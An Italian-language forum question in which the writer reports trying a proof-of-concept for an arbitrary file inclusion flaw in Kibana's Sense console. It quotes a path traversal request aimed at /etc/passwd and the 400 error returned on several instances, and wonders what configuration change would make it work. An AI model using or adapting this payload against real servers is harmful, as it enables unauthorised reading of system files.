Ho cercato di utilizzare questo codice PoC per la vulnerabilità di inclusione del file Arbitrary nella console di Kibana Sense.
La richiesta:
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
sta restituendo l'errore di follow:
{"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"request [/api/console/api_server] contains unrecognized parameter: [sense_version]"}],"type":"illegal_argument_exception","reason":"request [/api/console/api_server] contains unrecognized parameter: [sense_version]"},"status":400}
Ho ricevuto questo errore su più istanze, quindi penso che sia necessario apportare alcune modifiche alla configurazione prima di utilizzare questa richiesta.